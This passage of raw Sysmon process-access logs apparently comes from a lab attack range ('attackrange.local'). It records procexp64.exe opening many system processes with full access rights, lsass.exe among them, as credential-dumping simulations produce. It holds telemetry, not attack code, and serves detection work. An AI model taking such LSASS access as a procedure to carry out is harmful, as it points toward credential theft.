15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program 